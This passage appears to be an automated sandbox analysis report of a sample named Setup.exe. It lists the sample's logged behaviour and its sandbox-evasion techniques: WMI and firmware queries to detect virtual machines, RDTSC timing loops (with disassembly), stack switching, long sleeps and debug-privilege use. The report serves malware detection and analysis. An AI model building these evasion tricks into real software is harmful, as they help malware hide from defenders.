              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BC27C44
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BC2F3E1 second address: 6BC2F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BC2F3FD second address: 6BC2F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007FD71D48F975h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007FD71D48FA00h 0x00000031 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5509Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4203Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5R5F8.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\Desktop\Setup.exe TID: 7444Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 5509 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep count: 4203 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: Setup.exe, 00000000.00000003.1972142744.0000000000645000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000002.2006080250.000000000115D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1972142744.0000000000681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000002.2006080250.000000000115D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000002.00000002.1931860240.0000000007926000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020203A9 mov edx, dword ptr fs:[00000030h]0_2_020203A9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02020969 mov eax, dword ptr fs:[00000030h]0_2_02020969
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02020FB8 mov eax, dword ptr fs:[00000030h]0_2_02020FB8
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02020FB9 mov eax, dword ptr fs:[00000030h]0_2_02020FB9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02020D19 mov eax, dword ptr fs:[00000030h]0_2_02020D19
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
